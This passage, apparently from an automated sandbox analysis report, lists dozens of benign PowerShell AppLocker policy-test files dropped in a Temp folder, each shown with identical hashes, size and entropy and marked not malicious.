                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jbhosezf.bjx.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jmkaikem.gki.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jon53snl.mdn.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kki5slp3.13j.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbweu1jr.nsj.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lw3v5tyt.bxa.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m0pedcss.qe4.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mdphu4nt.ddn.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mflnm0ey.max.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_moaehaoa.q1a.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmxvx321.p1y.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_no1fpfxa.r0h.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npigztp0.hol.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nqiqrdky.gmn.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nz225kfi.gg0.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nzdv31dr.ziw.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oc0rnd2w.qxp.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ose0wsar.z2f.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oswjyecq.vox.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pchyf5kz.3x1.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pg15wgwj.cl0.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ppw5w2gj.dkn.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qxs0mxhm.uir.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r2by2z5q.qgb.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s54zt2hs.fko.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v1v00ud5.raa.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vxqvh2or.iml.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wjaiyosj.cmw.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wq2kqr40.w22.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wyr1smbm.ipc.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwmeccoa.umk.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
